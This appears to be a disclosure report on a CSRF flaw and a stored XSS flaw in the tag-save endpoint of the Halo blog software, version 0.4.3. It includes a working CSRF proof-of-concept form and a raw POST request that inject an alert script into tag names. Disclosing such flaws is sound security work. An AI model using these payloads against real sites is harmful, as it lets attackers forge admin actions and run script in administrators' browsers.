A CSRF vulnerability and A XSS vulnerability in admin/tag/save

[m4ra7h0n]

A CSRF vulnerability and A XSS vulnerability in article tag save was discovered in halo release v0.4.3

There is a CSRF vulnerability which allows remote attackers to send web page with CSRF script ,attackers could use this CSRF vulnerability add tag with XSS payload .

XSS Vulnerability url: https://demo.halo.run/admin/tag/save
CSRF Vulnerability url: https://demo.halo.run/admin/tag/save

CSRF payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.halo.run/admin/tag/save" method="POST">
      <input type="hidden" name="tagName" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="tagUrl" value="123" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

xss payload

POST /admin/tag/save HTTP/1.1
Host: demo.halo.run
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://demo.halo.run/admin/tag
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 54
Connection: close
Cookie: JSESSIONID=7pY4KPxPbsy7pPOuJ_5OghgiMpv14yT9XbfW_p20
Pragma: no-cache
Cache-Control: no-cache

tagName=%3Cscript%3Ealert(1)%3C%2Fscript%3E&tagUrl=123

when admin user post a article,the XSS payload in tag value would exec.